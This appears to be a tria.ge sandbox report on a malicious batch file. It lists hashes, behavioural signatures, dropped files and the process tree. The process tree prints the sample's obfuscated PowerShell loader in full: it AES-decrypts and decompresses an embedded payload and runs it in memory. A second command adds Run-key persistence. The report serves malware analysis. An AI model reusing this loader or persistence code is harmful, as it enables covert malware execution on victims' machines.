Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
1s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
08/01/2024, 20:50
Static task
static1
Behavioral task
behavioral1
Sample
310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat
Resource
win10v2004-20231215-en
General
-
Target
310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat
-
Size
1.6MB
-
MD5
4fbb5e9e5b5690f1b361f9f67d10e25c
-
SHA1
b77eeb5b8b08f5dfa427cd078423e4f190a28c41
-
SHA256
310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3
-
SHA512
640cac38739d0d0d1ad8f8dac89b444197ce3778d9eebe864e52ff4902f752c0a3971591f787cc67ecadd538cd2668409423403b2fef2928cfcd837b5b98c770
-
SSDEEP
24576:qK9lTH+TerznENh/hOe4/Vty848E2CYMjGUdaDJG8wxspPFZ4SAIXnp:Ld+TAnEzZpgP48NmzUWM
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 4360 310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4360 310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat.exe 4360 310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4360 310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 5076 wrote to memory of 4360 5076 cmd.exe 31 PID 5076 wrote to memory of 4360 5076 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:5076 -
C:\Users\Admin\AppData\Local\Temp\310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat.exe"310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_EpMhA = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat').Split([Environment]::NewLine);foreach ($_CASH_XmsgQ in $_CASH_EpMhA) { if ($_CASH_XmsgQ.StartsWith(':: @')) { $_CASH_ZQHrQ = $_CASH_XmsgQ.Substring(4); break; }; };$_CASH_ZQHrQ = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ZQHrQ, '_CASH_', '');$_CASH_SYRjr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_ZQHrQ);$_CASH_PvKMs = New-Object System.Security.Cryptography.AesManaged;$_CASH_PvKMs.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_PvKMs.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_PvKMs.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6hNp6znpdVtLRa88u+RJyOIAqy0yV+kZzUW8J2gDR2A=');$_CASH_PvKMs.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yDzuGGfzy2kiH4wwo0D5Gg==');$_CASH_GbaEH = $_CASH_PvKMs.CreateDecryptor();$_CASH_SYRjr = $_CASH_GbaEH.TransformFinalBlock($_CASH_SYRjr, 0, $_CASH_SYRjr.Length);$_CASH_GbaEH.Dispose();$_CASH_PvKMs.Dispose();$_CASH_NifoM = New-Object System.IO.MemoryStream(, $_CASH_SYRjr);$_CASH_AvJfW = New-Object System.IO.MemoryStream;$_CASH_wZAxN = New-Object System.IO.Compression.GZipStream($_CASH_NifoM, [IO.Compression.CompressionMode]::Decompress);$_CASH_wZAxN.CopyTo($_CASH_AvJfW);$_CASH_wZAxN.Dispose();$_CASH_NifoM.Dispose();$_CASH_AvJfW.Dispose();$_CASH_SYRjr = $_CASH_AvJfW.ToArray();$_CASH_VbXeh = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_SYRjr);$_CASH_eGoft = $_CASH_VbXeh.EntryPoint;$_CASH_eGoft.Invoke($null, (, [string[]] ('')))2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4360 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat' -Value '"C:\Users\Admin\AppData\Local\Temp\310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat.exe"' -PropertyType 'String'3⤵PID:4140
-
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5227556da5e65f6819f477756808c17e4
SHA16ffce766e881ca2a60180bb25f4981b183f78279
SHA256101f5fe8a4192f14e9f0a12c105ca81c9f176860930af44747185dd1bedb59a4
SHA512d46b935809d2c4b7a041ad790f2db11c0a808df022c91ae9152b8769021b884fde49653a7a46557ef9ee65e274fe0b6c8503df9b50e6b3b849fefacf51f8bd6a
-
C:\Users\Admin\AppData\Local\Temp\310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat.exe
Filesize22KB
MD57665a993d32d1486f5508d933f037d90
SHA1f881a345895f5b093c8b0b1b715bb541380970dd
SHA256c5aefb45657ad9b15fdb86f3c84baab237de98fea7177eeac0ef8f5c786b93a2
SHA512058421b50531ed059bc95d9c033e2c26d8e959677359fa1881b8908324eb2c55253a0acb4e640affbd6eaad0057e07da00e9ad662ffa7ae1f7057d6705f71cca
-
C:\Users\Admin\AppData\Local\Temp\310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat.exe
Filesize183KB
MD5a549354b000284df2199996df6542728
SHA1bee835c67f139026d952169e90cd9e10f7c2161d
SHA25652d24c03ebea6fd7d3a230203c28defac90f0a91cb5bf0ffb67e04fcd5c05160
SHA51232f687c5a0a2a7dd2d2f923a06420e506fd297c2f00d2fe65a383a7714dd80095d181e37a634b88c7a0f391a1ef3187daa0a0e541857512c44aa291d2b83fcde
-
Filesize
64KB
MD5b0ff6c01f2178cc3fa88aa81a684ba96
SHA1557c9d272bd021fd6bfb52d0492e156d518eb71c
SHA2560ccbd3caeb13ef25ff0b7b527673d15da9b1d66a37f170067657e747c6d0af74
SHA5125f1de9ddc7b9f59aa7fb5872c1f96d9e7468d5bafa4715e44d454cf80b6b21fb9bf6285294945a72a39c6f0a60e5f042ec3cdcc6df52e72d15ea945d683a1dae
-
Filesize
61KB
MD5b49c90679b4d095c347299b90d710780
SHA11dd720622f578ee9c7f12739cc021c023d25d227
SHA256a4e3201a8f8cc042aa37d06104e5ba7de83df6786ca40e4a7fe7e0fc27878d00
SHA512681bc72e46d55c47c5d93914dd294ed4fc07446c40f8a1c5875c76a2c3569c12db59c9f76351163551dab30ba8a2f95b21a69de909f92c9709cdd05ed63b93ea
-
Filesize
89KB
MD589315ade6ec1a810721566d2e4a31bc7
SHA17d13c641a26900c97d44d81e0af18f5dfcfb5d41
SHA2569d085335ea760e155b2866377b122160bad8d609e37ba7d54acea1433453471b
SHA51256f4e989f92e6ec8f0b3e7d289866267f5162cfca99d56bcf796346565c3e2408e2779e96ce2d1043206a0f843d1b0fc668f6ef07b389c48a771338ecda822a0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82